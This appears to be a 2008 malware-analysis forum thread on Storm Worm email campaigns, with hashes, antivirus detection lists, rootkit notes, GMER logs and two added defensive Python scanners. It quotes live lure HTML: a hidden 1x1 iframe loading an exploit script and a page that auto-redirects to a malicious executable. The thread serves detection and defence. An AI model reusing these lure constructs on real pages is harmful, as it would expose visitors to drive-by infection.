  • Amero currency Union is now the reality.
Body:
  • The Amero is here.
  • Amero - the secret currency.
  • Death of the U.S. Dollar.

<h4>
Detection of amero.exe
</h4>
File size: 90625 bytes
MD5...: 615f14de3233f7746a8c88acd7295709
SHA1..: a6819c61c0089ba6aec81a6c63b5734be2bc2786
SHA256: 7d942808c48f6e032de4d80f18b98398c1f2cd61ea01c979e699e60472110e59
PEiD..: -
QUOTE
File amero.exe received on 07.21.2008 22:39:16 (CET)
AhnLab-V3 2008.7.21.1 2008.07.21 -
AntiVir 7.8.1.11 2008.07.21 HEUR/Crypted
Authentium 5.1.0.4 2008.07.21 -
Avast 4.8.1195.0 2008.07.21 -
AVG 8.0.0.130 2008.07.21 I-Worm/Nuwar.N
BitDefender 7.2 2008.07.21 Dropped:Rootkit.Agent.AITJ
CAT-QuickHeal 9.50 2008.07.21 -
ClamAV 0.93.1 2008.07.21 -
DrWeb 4.44.0.09170 2008.07.21 -
eSafe 7.0.17.0 2008.07.21 Suspicious File
eTrust-Vet 31.6.5971 2008.07.21 -
Ewido 4.0 2008.07.21 -
F-Prot 4.4.4.56 2008.07.21 -
F-Secure 7.60.13501.0 2008.07.21 Email-Worm.Win32.Zhelatin.aep
Fortinet 3.14.0.0 2008.07.21 -
GData 2.0.7306.1023 2008.07.21 Email-Worm.Win32.Zhelatin.aep
Ikarus T3.1.1.34.0 2008.07.21 -
Kaspersky 7.0.0.125 2008.07.21 Email-Worm.Win32.Zhelatin.aep
McAfee 5343 2008.07.21 W32/Nuwar@MM
Microsoft 1.3704 2008.07.21 -
NOD32v2 3284 2008.07.21 -
Norman 5.80.02 2008.07.21 -
Panda 9.0.0.4 2008.07.21 Suspicious file
PCTools 4.4.2.0 2008.07.21 -
Prevx1 V2 2008.07.21 -
Rising 20.54.02.00 2008.07.21 -
Sophos 4.31.0 2008.07.21 Mal/TibsPak
Sunbelt 3.1.1536.1 2008.07.18 -
Symantec 10 2008.07.21 Trojan.Peacomm.D
TheHacker 6.2.96.385 2008.07.20 -
TrendMicro 8.700.0.1004 2008.07.21 -
VBA32 3.12.8.1 2008.07.21 -
VirusBuster 4.5.11.0 2008.07.21 -
Webwasher-Gateway 6.6.2 2008.07.21 Heuristic.Crypted
<h4>
Detection of glok+****-****.sys
</h4>
File size: 127104 bytes
MD5...: f91cc9c4c506d195ef5a9d35fecc71a7
SHA1..: cc97310ef67afd4ad4041159556b90e252e6cfa1
SHA256: 35add3ab60b411be1d2bf14121b2d15819c8e6af365704aa1c5387ac324fdf1d
PEiD..: -
QUOTE
File glok_de7-6d2d.sys received on 07.21.2008 23:19:40 (CET)
AhnLab-V3 2008.7.21.1 2008.07.21 -
AntiVir 7.8.1.11 2008.07.21 TR/Rootkit.Gen
Authentium 5.1.0.4 2008.07.21 W32/Dropper.gen6
Avast 4.8.1195.0 2008.07.21 Win32:Zhelatin-CEC
AVG 8.0.0.130 2008.07.21 I-Worm/Nuwar.N
BitDefender 7.2 2008.07.21 Rootkit.Agent.AITJ
CAT-QuickHeal 9.50 2008.07.21 I-Worm.Zhelatin.aec
ClamAV 0.93.1 2008.07.21 -
DrWeb 4.44.0.09170 2008.07.21 Trojan.MulDrop.17826
eSafe 7.0.17.0 2008.07.21 -
eTrust-Vet 31.6.5971 2008.07.21 Win32/Sintun!generic
Ewido 4.0 2008.07.21 -
F-Prot 4.4.4.56 2008.07.21 W32/Dropper.gen6
F-Secure 7.60.13501.0 2008.07.21 Email-Worm.Win32.Zhelatin.aec
Fortinet 3.14.0.0 2008.07.21 W32/Dorf.AEC@mm
GData 2.0.7306.1023 2008.07.21 Email-Worm.Win32.Zhelatin.aec
Ikarus T3.1.1.34.0 2008.07.21 Email-Worm.Win32.Zhelatin.aec
Kaspersky 7.0.0.125 2008.07.21 -
McAfee 5343 2008.07.21 Downloader-BAI.sys.gen.a
Microsoft 1.3704 2008.07.21 Backdoor:WinNT/Nuwar.B!sys
NOD32v2 3284 2008.07.21 -
Norman 5.80.02 2008.07.21 W32/DLoader.IMPC
Panda 9.0.0.4 2008.07.21 -
PCTools 4.4.2.0 2008.07.21 Rootkit.QQHelp.Gen.6
Prevx1 V2 2008.07.21 -
Rising 20.54.02.00 2008.07.21 -
Sophos 4.31.0 2008.07.21 Troj/Dorf-Fam
Sunbelt 3.1.1536.1 2008.07.18 -
Symantec 10 2008.07.21 Trojan.Peacomm.D
TheHacker 6.2.96.385 2008.07.20 -
TrendMicro 8.700.0.1004 2008.07.21 -
VBA32 3.12.8.1 2008.07.21 -
VirusBuster 4.5.11.0 2008.07.21 Rootkit.QQHelp.Gen.6
Webwasher-Gateway 6.6.2 2008.07.21 Trojan.Rootkit.Gen
<h4>
Notes
</h4>
  • Modifies the settings related to the synchronization of Internet Time.
  • Installation of a kernel-mode driver again (rootkit). The service and the sys file are partially random: glok+[random 3 or 4 letters / numbers]-[random 3 or 4 letters / numbers]
  • A new memory page was created in the address space of %System%\services.exe
  • Request of inbound & outbound connections if your firewall intercepts them.
  • Config File: glok+serv.config
Note: %System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

Visible signs.
None.
Rootkit scan.

Clean PC.

QUOTE
---- Devices - GMER 1.0.14 ----

AttachedDevice \FileSystem\Ntfs \Ntfs SYMEVENT.SYS (Symantec Event Library/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Ip SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Tcp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Udp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\RawIp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
Rootkit installed.

QUOTE
GMER 1.0.14.14536 - http://www.gmer.net
Rootkit scan 2008-07-21 22:55:27
Windows 5.1.2600 Service Pack 2

---- System - GMER 1.0.14 ----

SSDT \??\C:\WINDOWS\glok+de7-6d2d.sys ZwEnumerateKey [0xF42CF930]
SSDT \??\C:\WINDOWS\glok+de7-6d2d.sys ZwEnumerateValueKey [0xF42CFAAE]
SSDT \??\C:\WINDOWS\glok+de7-6d2d.sys ZwQueryDirectoryFile [0xF42CF5E6]

---- Devices - GMER 1.0.14 ----

AttachedDevice \FileSystem\Ntfs \Ntfs SYMEVENT.SYS (Symantec Event Library/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Ip SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Ip glok+de7-6d2d.sys
AttachedDevice \Driver\Tcpip \Device\Tcp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Tcp glok+de7-6d2d.sys
AttachedDevice \Driver\Tcpip \Device\Udp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Udp glok+de7-6d2d.sys
AttachedDevice \Driver\Tcpip \Device\RawIp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\RawIp glok+de7-6d2d.sys

Device \Driver\SYMTDI \Device\SymTDI glok+de7-6d2d.sys

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\glok+de7-6d2d.sys (*** hidden *** ) [AUTO] glok+de7-6d2d

---- Registry - GMER 1.0.14 ----

Reg HKLM\SYSTEM\CurrentControlSet\Services\glok+de7-6d2d
Reg HKLM\SYSTEM\CurrentControlSet\Services\glok+de7-6d2d@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\glok+de7-6d2d@Start 2
Reg HKLM\SYSTEM\CurrentControlSet\Services\glok+de7-6d2d@ErrorControl 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\glok+de7-6d2d@ImagePath \??\C:\WINDOWS\glok+de7-6d2d.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\glok+de7-6d2d@DisplayName glok+de7-6d2d
Reg HKLM\SYSTEM\CurrentControlSet\Services\glok+de7-6d2d\Security
Reg HKLM\SYSTEM\CurrentControlSet\Services\glok+de7-6d2d\Security@Security 0x01 0x00 0x14 0x80 ...

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\glok+de7-6d2d.sys 127104 bytes
File C:\WINDOWS\glok+serv.config 47522 bytes

---- EOF - GMER 1.0.14 ----
SymTDI is the Norton Internet Security filter; the driver has been replaced by the rootkit.

Don't visit the pages, they contain an iframe leading to an encoded / obfuscated script and the same exploits as seen on June 20th.
CODE
<iframe src="ind.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
If the exploits don't trigger anything, a click on the picture will download amero.exe.
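To make the comparison between the clean and infected GMER reports above mechanical, here is an added example (not part of the post and not GMER's own tooling) that parses the SSDT, AttachedDevice, Device and hidden Service lines of both reports, diffs the device attachments against the clean baseline, and labels the three hooked services as hiding hooks. Both reports are constructed from the logs quoted above and shortened; the regular expressions assume the GMER 1.0.14 text layout shown there.

```python
"""Pull rootkit indicators out of GMER text reports and diff a suspect scan
against a clean baseline: SSDT hooks, devices newly attached to the TCP/IP
and file-system stacks, device objects taken over by another driver, and
services GMER flags as hidden."""
import re

# Constructed samples, cut down from the two GMER logs quoted in the post.
CLEAN_SCAN = r"""
---- Devices - GMER 1.0.14 ----

AttachedDevice \FileSystem\Ntfs \Ntfs SYMEVENT.SYS (Symantec Event Library/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Ip SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Tcp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
"""

INFECTED_SCAN = r"""
---- System - GMER 1.0.14 ----

SSDT \??\C:\WINDOWS\glok+de7-6d2d.sys ZwEnumerateKey [0xF42CF930]
SSDT \??\C:\WINDOWS\glok+de7-6d2d.sys ZwEnumerateValueKey [0xF42CFAAE]
SSDT \??\C:\WINDOWS\glok+de7-6d2d.sys ZwQueryDirectoryFile [0xF42CF5E6]

---- Devices - GMER 1.0.14 ----

AttachedDevice \FileSystem\Ntfs \Ntfs SYMEVENT.SYS (Symantec Event Library/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Ip SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Ip glok+de7-6d2d.sys
AttachedDevice \Driver\Tcpip \Device\Tcp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Tcp glok+de7-6d2d.sys

Device \Driver\SYMTDI \Device\SymTDI glok+de7-6d2d.sys

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\glok+de7-6d2d.sys (*** hidden *** ) [AUTO] glok+de7-6d2d
"""

# Line shapes as printed by GMER 1.0.14 in the logs above (an assumption
# about the layout; other versions may differ).
SSDT_RE = re.compile(r"^SSDT\s+(\S+)\s+(Zw\w+)\s+\[(0x[0-9A-Fa-f]+)\]")
ATTACHED_RE = re.compile(r"^AttachedDevice\s+(\S+)\s+(\S+)\s+(\S+)(?:\s+\((.*)\))?$")
DEVICE_RE = re.compile(r"^Device\s+(\S+)\s+(\S+)\s+(\S+)$")
SERVICE_RE = re.compile(r"^Service\s+(\S+)\s+\(\*\*\* hidden \*\*\* \)\s+\[(\w+)\]\s+(\S+)")

# The three services hooked in the post's log: enumerating registry keys and
# values and listing directories, i.e. exactly what a rootkit intercepts to
# hide its own service key and driver file.
HIDING_HOOKS = {"ZwEnumerateKey", "ZwEnumerateValueKey", "ZwQueryDirectoryFile"}


def parse_gmer(text):
    """Return the indicators of one report as a dict of lists."""
    report = {"ssdt": [], "attached": [], "devices": [], "hidden_services": []}
    for raw in text.splitlines():
        line = raw.strip()
        if (m := SSDT_RE.match(line)):
            report["ssdt"].append({"driver": m[1], "function": m[2], "addr": m[3]})
        elif (m := ATTACHED_RE.match(line)):
            # Vendor annotation is absent when GMER cannot attribute the driver.
            report["attached"].append({"stack": m[1], "device": m[2], "driver": m[3], "vendor": m[4]})
        elif (m := DEVICE_RE.match(line)):
            report["devices"].append({"owner": m[1], "device": m[2], "driver": m[3]})
        elif (m := SERVICE_RE.match(line)):
            report["hidden_services"].append({"image": m[1], "start": m[2], "name": m[3]})
    return report


def new_attachments(baseline, suspect):
    """Device attachments in the suspect scan that the baseline did not have."""
    known = {(a["stack"], a["device"], a["driver"]) for a in baseline["attached"]}
    return [a for a in suspect["attached"]
            if (a["stack"], a["device"], a["driver"]) not in known]


def findings(baseline, suspect):
    """Human-readable list of what changed and why it matters."""
    out = []
    for h in suspect["ssdt"]:
        why = "hides registry/file objects" if h["function"] in HIDING_HOOKS else "kernel service hooked"
        out.append(f"SSDT hook on {h['function']} by {h['driver']} at {h['addr']}: {why}")
    for a in new_attachments(baseline, suspect):
        vendor = a["vendor"] or "no vendor information"
        out.append(f"new filter on {a['device']}: {a['driver']} ({vendor})")
    for d in suspect["devices"]:
        out.append(f"device {d['device']} owned by {d['owner']} now served by {d['driver']}")
    for s in suspect["hidden_services"]:
        out.append(f"hidden service {s['name']} -> {s['image']} [{s['start']}]")
    return out


if __name__ == "__main__":
    for line in findings(parse_gmer(CLEAN_SCAN), parse_gmer(INFECTED_SCAN)):
        print(line)
```

The baseline diff is what matters in practice: the Symantec filters attach to the same TCP/IP devices on a clean machine, so a flat list of AttachedDevice lines is noisy, while the entries that appear only in the suspect scan, carry no vendor attribution and sit in %windir% rather than a drivers directory are the ones worth chasing.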
Kimberly
<h4>
Love theme
</h4>
After ID4, World War 3 & the Amero why not get back to a more classical theme ... Love.

Subject:
  • Crazy in love.
  • Fallen for you.
Body:
  • I give my heart to you.
  • I Wanna Be With You.

<h4>
Detection of postcard.exe
</h4>
File size: 91137 bytes
MD5...: 1102166b2383733e3088763933a0266a
SHA1..: d60d00ac2488898e0a558ab9e1843f16c7428eca
SHA256: 752f81d5dc91232a2c163082e000607483dfc5e1e0c784e6f929d65b8022a2f2
PEiD..: -
QUOTE
File postcard.exe received on 07.24.2008 20:43:18 (CET)
AhnLab-V3 2008.7.25.0 2008.07.24 -
AntiVir 7.8.1.12 2008.07.24 -
Authentium 5.1.0.4 2008.07.24 -
Avast 4.8.1195.0 2008.07.24 -
AVG 8.0.0.130 2008.07.24 I-Worm/Nuwar.V
BitDefender 7.2 2008.07.24 Trojan.Peed.JPS
CAT-QuickHeal 9.50 2008.07.24 -
ClamAV 0.93.1 2008.07.24 -
DrWeb 4.44.0.09170 2008.07.24 -
eSafe 7.0.17.0 2008.07.24 Suspicious File
eTrust-Vet 31.6.5979 2008.07.24 -
Ewido 4.0 2008.07.24 -
F-Prot 4.4.4.56 2008.07.24 -
F-Secure 7.60.13501.0 2008.07.24 Packed.Win32.Tibs.kg
Fortinet 3.14.0.0 2008.07.24 -
GData 2.0.7306.1023 2008.07.24 Packed.Win32.Tibs.kg
Ikarus T3.1.1.34.0 2008.07.24 -
Kaspersky 7.0.0.125 2008.07.24 Packed.Win32.Tibs.kg
McAfee 5346 2008.07.24 -
Microsoft 1.3704 2008.07.24 -
NOD32v2 3296 2008.07.24 a variant of Win32/Nuwar.DF
Norman 5.80.02 2008.07.24 -
Panda 9.0.0.4 2008.07.24 Suspicious file
PCTools 4.4.2.0 2008.07.24 -
Prevx1 V2 2008.07.24 -
Rising 20.54.32.00 2008.07.24 -
Sophos 4.31.0 2008.07.24 Mal/Dorf-O
Sunbelt 3.1.1536.1 2008.07.18 -
Symantec 10 2008.07.24 Trojan.Peacomm.D
TheHacker 6.2.96.387 2008.07.23 -
TrendMicro 8.700.0.1004 2008.07.24 -
VBA32 3.12.8.1 2008.07.24 -
ViRobot 2008.7.24.1309 2008.07.24 -
VirusBuster 4.5.11.0 2008.07.24 -
Webwasher-Gateway 6.6.2 2008.07.24 -
<h4>
Notes
</h4>
  • Modifies the settings related to the synchronization of Internet Time.
  • Installation of a kernel-mode driver (rootkit). The service and the sys file are partially random: glok+[random 3 or 4 letters / numbers]-[random 3 or 4 letters / numbers]
  • A new memory page was created in the address space of %System%\services.exe
  • Request of inbound & outbound connections if your firewall intercepts them.
  • Config File: glok+serv.config
Note: %System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

Don't visit the pages, they contain an iframe leading to an encoded / obfuscated script and the same exploits as seen on June 20th.
If the exploits don't trigger anything, a click on the link will download postcard.exe.
Kimberly
<h4>
FBI vs Facebook
</h4>
FBI vs Facebook is the new theme chosen by the authors of storm.

<h4>
Detection of fbi_facebook.exe
</h4>
VirusTotal Results.
fbi_facebook.exe: 18/35 (51.43%)
glok+4009-7783.sys: 23/34 (67.65%)
<h4>
Notes
</h4>
  • Modifies the settings related to the synchronization of Internet Time.
  • Installation of a kernel-mode driver (rootkit). The service and the sys file are partially random: glok+[random 3 or 4 letters / numbers]-[random 3 or 4 letters / numbers]
  • A new memory page was created in the address space of %System%\services.exe
  • Request of inbound & outbound connections if your firewall intercepts them.
  • Config File: glok+serv.config
Note: %System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

ind.php is no longer included as an iframe on the page. At least for the time being, victims will not be exposed to the exploits we saw in the other themes since June 20th.
Kimberly
<h4>
You have an Ecard
</h4>
Back to the Ecards. This time domains are used again instead of IP's.

<h4>
Detection of postcard.exe
</h4>
VirusTotal Results.
postcard.exe: 20/36 (55.56%)
glok+7d74-67d0.sys: 30/36 (83.34%)
<h4>
Notes
</h4>
  • Modifies the settings related to the synchronization of Internet Time.
  • Installation of a kernel-mode driver (rootkit). The service and the sys file are partially random: glok+[random 3 or 4 letters / numbers]-[random 3 or 4 letters / numbers]
  • A new memory page was created in the address space of %System%\services.exe
  • Request of inbound & outbound connections if your firewall intercepts them.
  • Config File: glok+serv.config
Note: %System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

Again no exploits present on the pages.
CODE
GET /?e329c1e4a92b7d HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: bestlettercard.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.6.31
Date: Wed, 06 Aug 2008 01:25:38 GMT
Content-Type: text/html
Content-Length: 352
Connection: close
Accept-Ranges: bytes
Keep-Alive: Closed

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Postcard</title>
<meta http-equiv="Refresh" content="3; URL=postcard.exe">
</head>
<body>
<center>
Your download will start shortly.
If you are unable to see your postcard,
<a href="postcard.exe">save it</a> in and run on your computer.<br>
</center>
</body>
</html>
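The two lure pages quoted in this thread (the Beijing page from the June 20 post, with its 1x1 hidden iframe to ind.php, and the postcard page above, with a meta refresh to postcard.exe) can both be flagged statically from captured HTML. The scanner below is an added example, not code from the posts; it uses only the standard-library HTMLParser, and the two page samples are the thread's own HTML trimmed to the relevant tags. The list of extensions treated as "executable" is my assumption.

```python
"""Static checks for the two lure-page tricks quoted in this thread: a 1x1
hidden <iframe> that loads the exploit script (the Beijing page) and a
<meta refresh> plus download link that hands the visitor an .exe (the
postcard page). Works on captured HTML only; nothing is fetched."""
from html.parser import HTMLParser

# Assumed set of extensions that should never be a page's redirect target.
EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".com", ".bat")

# Both pages are the HTML quoted in the thread (Beijing: June 20 post,
# postcard: the "You have an Ecard" post), trimmed to the relevant tags.
BEIJING_PAGE = """<html><head><title>Strongest earthquake hits Beijing</title></head>
<body><table align="center" width="410" border=0>
<tr><td>Click on the video to see the details of this terrible disaster and choose either "Open" or "Run".
<br><br><a href="beijing.exe"><img border=0 src="mov.gif"></a></td></tr>
<iframe src="ind.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
</table></body></html>"""

POSTCARD_PAGE = """<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Postcard</title>
<meta http-equiv="Refresh" content="3; URL=postcard.exe">
</head><body><center>Your download will start shortly.
If you are unable to see your postcard, <a href="postcard.exe">save it</a> in and run on your computer.<br>
</center></body></html>"""


def _refresh_target(content):
    """Extract the URL from a meta-refresh content value such as '3; URL=x'."""
    idx = content.lower().find("url=")
    return content[idx + 4:].strip().strip("'\"") if idx >= 0 else ""


def _is_executable(url):
    # Drop any query string before looking at the extension.
    return url.split("?", 1)[0].lower().endswith(EXECUTABLE_EXT)


class LureScanner(HTMLParser):
    """Collect (kind, target) findings while the page is parsed."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lower-cases attribute names
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            hidden = "visibility:hidden" in style or "display:none" in style
            if tiny or hidden:
                self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            target = _refresh_target(a.get("content", ""))
            if _is_executable(target):
                self.findings.append(("meta_refresh_to_executable", target))
        elif tag == "a" and _is_executable(a.get("href", "")):
            self.findings.append(("link_to_executable", a["href"]))


def scan_html(html):
    """Return the list of findings for one captured page, in document order."""
    scanner = LureScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for name, page in (("beijing", BEIJING_PAGE), ("postcard", POSTCARD_PAGE)):
        print(name, scan_html(page))
```

Run over proxy or sandbox captures, the hidden-iframe rule catches the ind.php inclusion the earlier themes used, and the meta-refresh rule still fires on the later pages that dropped the exploits and rely on the victim saving and running the .exe.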